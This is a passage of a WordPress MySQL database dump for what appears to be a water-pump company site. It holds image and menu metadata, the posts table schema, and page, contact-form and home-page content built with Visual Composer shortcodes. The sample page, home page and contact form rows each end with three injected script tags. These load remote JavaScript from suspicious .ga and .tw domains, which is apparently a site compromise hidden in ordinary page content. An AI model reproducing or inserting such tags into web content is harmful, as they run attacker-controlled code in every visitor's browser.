"2018/01/logo-dab.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"logo-dab-150x54.png\";s:5:\"width\";i:150;s:6:\"height\";i:54;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-widget\";a:4:{s:4:\"file\";s:19:\"logo-dab-100x54.png\";s:5:\"width\";i:100;s:6:\"height\";i:54;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"nectar_small_square\";a:4:{s:4:\"file\";s:19:\"logo-dab-140x54.png\";s:5:\"width\";i:140;s:6:\"height\";i:54;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(7742,6663,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7743,6663,'_menu_item_type','post_type'),(7744,6663,'_menu_item_menu_item_parent','0'),(7745,6663,'_menu_item_object_id','5'),(7746,6663,'_menu_item_object','page'),(7747,6663,'_menu_item_target',''),(7748,6663,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(7749,6663,'_menu_item_xfn',''),(7750,6663,'_menu_item_url',''),(7752,6664,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7753,6664,'_menu_item_type','post_type'),(7754,6664,'_menu_item_menu_item_parent','0'),(7755,6664,'_menu_item_object_id','19'),(7756,6664,'_menu_item_object','page'),(7757,6664,'_menu_item_target',''),(7758,6664,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(7759,6664,'_menu_item_xfn',''),(7760,6664,'_menu_item_url',''),(7762,6665,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(7763,6665,'_menu_item_type','post_type'),(7764,6665,'_menu_item_menu_item_parent','0'),(7765,6665,'_menu_item_object_id','25'),(7766,6665,'_menu_item_object','page'),(7767,6665,'_menu_item_target',''),(7768,6665,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(7769,6665,'_menu_item_xfn',''),(7770,6665,'_menu_item_url',''),(7771,6357,'nectar_blog_post_view_count','2'),(7772,6357,'_nectar_love','0'),(7774,5,'_wpb_shortcodes_custom_css','.vc_custom_1517272578121{margin-bottom: 10px !important;}.vc_custom_1517273391931{margin-bottom: 10px !important;}.vc_custom_1517273410378{margin-bottom: 10px !important;}.vc_custom_1517273960070{margin-bottom: 10px !important;}.vc_custom_1517273982432{margin-bottom: 10px !important;}.vc_custom_1517274001996{margin-bottom: 10px !important;}.vc_custom_1485550874781{margin-top: -10px !important;}'),(7775,6678,'_wp_attached_file','2018/01/bg-banner.jpg'),(7776,6678,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1600;s:6:\"height\";i:900;s:4:\"file\";s:21:\"2018/01/bg-banner.jpg\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"bg-banner-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"bg-banner-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"bg-banner-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"bg-banner-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"portfolio-thumb\";a:4:{s:4:\"file\";s:21:\"bg-banner-600x403.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:403;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"portfolio-thumb_small\";a:4:{s:4:\"file\";s:21:\"bg-banner-400x269.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:269;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-widget\";a:4:{s:4:\"file\";s:21:\"bg-banner-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"nectar_small_square\";a:4:{s:4:\"file\";s:21:\"bg-banner-140x140.jpg\";s:5:\"width\";i:140;s:6:\"height\";i:140;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"wide\";a:4:{s:4:\"file\";s:22:\"bg-banner-1000x500.jpg\";s:5:\"width\";i:1000;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wide_small\";a:4:{s:4:\"file\";s:21:\"bg-banner-670x335.jpg\";s:5:\"width\";i:670;s:6:\"height\";i:335;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"regular\";a:4:{s:4:\"file\";s:21:\"bg-banner-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"regular_small\";a:4:{s:4:\"file\";s:21:\"bg-banner-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"tall\";a:4:{s:4:\"file\";s:21:\"bg-banner-500x900.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"wide_tall\";a:4:{s:4:\"file\";s:22:\"bg-banner-1000x900.jpg\";s:5:\"width\";i:1000;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"wide_photography\";a:4:{s:4:\"file\";s:21:\"bg-banner-900x600.jpg\";s:5:\"width\";i:900;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"large_featured\";a:4:{s:4:\"file\";s:22:\"bg-banner-1600x700.jpg\";s:5:\"width\";i:1600;s:6:\"height\";i:700;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"medium_featured\";a:4:{s:4:\"file\";s:21:\"bg-banner-800x800.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}');
/*!40000 ALTER TABLE `wm_postmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wm_posts`
--

DROP TABLE IF EXISTS `wm_posts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wm_posts` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT 0,
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext NOT NULL,
  `post_title` text NOT NULL,
  `post_excerpt` text NOT NULL,
  `post_status` varchar(20) NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) NOT NULL DEFAULT 'open',
  `post_password` varchar(255) NOT NULL DEFAULT '',
  `post_name` varchar(200) NOT NULL DEFAULT '',
  `to_ping` text NOT NULL,
  `pinged` text NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `guid` varchar(255) NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT 0,
  `post_type` varchar(20) NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`ID`),
  KEY `post_name` (`post_name`(191)),
  KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  KEY `post_parent` (`post_parent`),
  KEY `post_author` (`post_author`)
) ENGINE=InnoDB AUTO_INCREMENT=6688 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wm_posts`
--

LOCK TABLES `wm_posts` WRITE;
/*!40000 ALTER TABLE `wm_posts` DISABLE KEYS */;
INSERT INTO `wm_posts` VALUES (2,1,'2017-12-09 18:44:57','2017-12-09 18:44:57','This is an example page. It\'s different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:\n\n<blockquote>Hi there! I\'m a bike messenger by day, aspiring actor by night, and this is my website. I live in Los Angeles, have a great dog named Jack, and I like pi&#241;a coladas. (And gettin\' caught in the rain.)</blockquote>\n\n...or something like this:\n\n<blockquote>The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.</blockquote>\n\nAs a new WordPress user, you should go to <a href=\"http://sandbox.futuremediatrix.com/medikpro/wp-admin/\">your dashboard</a> to delete this page and create new pages for your content. Have fun!<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Sample Page','','publish','closed','open','','sample-page','','','2017-12-09 18:44:57','2017-12-09 18:44:57','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=2',0,'page','',0),(5,1,'2015-12-30 15:17:20','2015-12-30 15:17:20','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_image=\"6678\" bg_position=\"center bottom\" bg_repeat=\"no-repeat\" parallax_bg=\"true\" parallax_bg_speed=\"slow\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"20%\" bottom_padding=\"20%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"waves_opacity\"][vc_column centered_text=\"true\" column_padding=\"padding-3-percent\" column_padding_position=\"left-right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text]\r\n<h1>PT Dabinter Pompa Air</h1>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" bottom_padding=\"30\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"300\"][vc_column_text]\r\n<h2>Text here</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"100\" bottom_padding=\"10\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" font_color=\"#ffffff\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517272578121{margin-bottom: 10px !important;}\"]\r\n<h5>Dabinter Call Center</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Call : 5678910\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273391931{margin-bottom: 10px !important;}\"]\r\n<h5>Our Agent</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"See more\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273410378{margin-bottom: 10px !important;}\"]\r\n<h5>Contact Us</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Drop us a message\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"10\" bottom_padding=\"100\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" font_color=\"#ffffff\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273960070{margin-bottom: 10px !important;}\"]\r\n<h5>Our Product</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Find our products\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273982432{margin-bottom: 10px !important;}\"]\r\n<h5>Frequently Asked Question</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Get the answer\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517274001996{margin-bottom: 10px !important;}\"]\r\n<h5>Article Area</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Tips and tricks\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"8%\" bottom_padding=\"4%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>Why Choose Us</h2>\r\n<h5><span style=\"color: #bbbbbb;\">A bit good reasons</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"8%\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h5>Hot Looks</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][vc_column_text]\r\n<h5>Best Price</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"800\"][vc_column_text]\r\n<h5>True Power</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\"  icon_size=\"\" animation_delay=\"1200\" image=\"basic_anchor.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"1200\"][vc_column_text]\r\n<h5>Happy Service</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"https://source.unsplash.com/collection/430468/daily\" bg_position=\"center center\" bg_repeat=\"no-repeat\" bg_color=\"#454156\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"5%\" bottom_padding=\"5%\" id=\"intro\" row_name=\"Intro\" enable_gradient=\"true\" color_overlay=\"#0a0a0a\" color_overlay_2=\"rgba(102,102,102,0.74)\" gradient_direction=\"left_b_to_right_t\" overlay_strength=\"0.95\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column centered_text=\"true\" column_padding=\"padding-6-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_custom_heading text=\"Best Water Pump You Can Find\" font_container=\"tag:h1|font_size:64|text_align:center|color:%23ffffff|line_height:80px\" use_theme_fonts=\"yes\"][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\" css=\".vc_custom_1485550874781{margin-top: -10px !important;}\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"100\"][vc_custom_heading text=\"We will help you a lot!\r\n\" font_container=\"tag:p|text_align:center|color:rgba(255%2C255%2C255%2C0.7)\" use_theme_fonts=\"yes\"][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-4-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][nectar_btn size=\"large\" button_style=\"regular\" button_color_2=\"Accent-Color\" icon_family=\"iconsmind\" url=\"#\" text=\"Show Me How\" icon_iconsmind=\"iconsmind-Triangle-ArrowRight\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Home','','publish','closed','closed','','home','','','2018-01-30 01:06:04','2018-01-30 01:06:04','',0,'http://themenectar.com/demo/salient-corporate/?page_id=4',0,'page','',0),(6,1,'2017-12-09 19:09:09','2017-12-09 19:09:09','<label> Your Name (required)\n    [text* your-name] </label>\n\n<label> Your Email (required)\n    [email* your-email] </label>\n\n<label> Subject\n    [text your-subject] </label>\n\n<label> Your Message\n    [textarea your-message] </label>\n\n[submit \"Send\"]\nMedikpro \"[your-subject]\"\n[your-name] <wordpress@sandbox.futuremediatrix.com>\nFrom: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Medikpro (http://sandbox.futuremediatrix.com/medikpro)\ndonny@futuremediatrix.com\nReply-To: [your-email]\n\n0\n0\n\nMedikpro \"[your-subject]\"\nMedikpro <wordpress@sandbox.futuremediatrix.com>\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Medikpro (http://sandbox.futuremediatrix.com/medikpro)\n[your-email]\nReply-To: donny@futuremediatrix.com\n\n0\n0\nThank you for your message. It has been sent.\nThere was an error trying to send your message. Please try again later.\nOne or more fields have an error. Please check and try again.\nThere was an error trying to send your message. Please try again later.\nYou must accept the terms and conditions before sending your message.\nThe field is required.\nThe field is too long.\nThe field is too short.<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Contact form 1','','publish','closed','closed','','contact-form-1','','','2017-12-09 19:09:09','2017-12-09 19:09:09','',0,'http://sandbox.futuremediatrix.com/medikpro/?post_type=wpcf7_contact_form&p=6',0,'wpcf7_contact_form','',0),(19,1,'2015-12-30 15:36:57','2015-12-30 15:36:57','[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][page_submenu alignment=\"center\" sticky=\"true\" bg_color=\"#111111\" link_color=\"#ffffff\"][page_link link_url=\"#why\" title=\"Why Medikpro\" tab_id=\"1451708274600-9\" id=\"1451966795422-6\"] [/page_link][page_link link_url=\"#vismis\" title=\"Vision and Mission\" tab_id=\"1451708274600-9\" id=\"1451966795475-6\"] [/page_link][page_link link_url=\"#philosophy\" title=\"Philosophy\" tab_id=\"1451708274756-7\" id=\"1451966795453-10\"] [/page_link][/page_submenu][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"6502\" bg_position=\"center top\" bg_repeat=\"no-repeat\" bg_color=\"#cbcbc3\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"4%\" bottom_padding=\"4%\" id=\"why\" enable_gradient=\"true\" color_overlay_2=\"#151519\" gradient_direction=\"top_to_bottom\" overlay_strength=\"1\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" top_padding=\"65%\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column_inner][/vc_row_inner][split_line_heading]\r\n<h2>Why Us</h2>\r\n[/split_line_heading][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" 